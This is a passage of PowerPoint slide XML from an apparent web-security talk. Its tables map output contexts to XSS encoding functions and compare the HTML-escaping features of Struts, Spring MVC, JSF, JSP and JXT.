                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forJavaScriptAttribute</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encoder.JavaScriptEncode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="768096">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CSS</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Value</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CSS Hex Encode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forCssString</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forCssUrl</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encoder.CssEncode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="768096">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>URL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Fragment</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>UR</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> Encode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3CF"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="1400" b="1" err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encode.forUriComponent</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3C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err="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Encoder.UrlEncode</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="1">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marT="82296" anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="D8D3C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6212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76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FE802B6-14FE-284B-B3EB-ED34973F4B08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1122579967"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1367894"/>
          <a:ext cx="8229600" cy="4889725"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="949570">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1685750">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20001"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2228466">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20002"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1109609">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20003"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="1266803">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20004"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="989402">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20005"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="813205">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1200" b="1">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Struts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1200" b="1" baseline="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>2.3</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Spring MVC</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>JSF</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>JSP</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>JXT</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="813205">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>HTML</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;s:property escapeHtml/&gt;*</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>"defaultHtmlEscape" for the whole app in web.xml</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;spring:escapeBody htmlEscape="true"&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded**</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;c:out&gt; have to specify in each case</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:br>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10001"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="651699">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>Attribute</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>JSTL: ${fn:escapeXml(stringJS)}</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;spring:escapeBody htmlEscape="true"&gt;</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;c:out&gt; have to specify in each case</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>automatically encoded</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="127000" marR="127000" marT="88900" marB="88900">
                    <a:solidFill>
                      <a:schemeClr val="accent2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10002"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="651699">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="l" fontAlgn="t">
                        <a:spcBef>
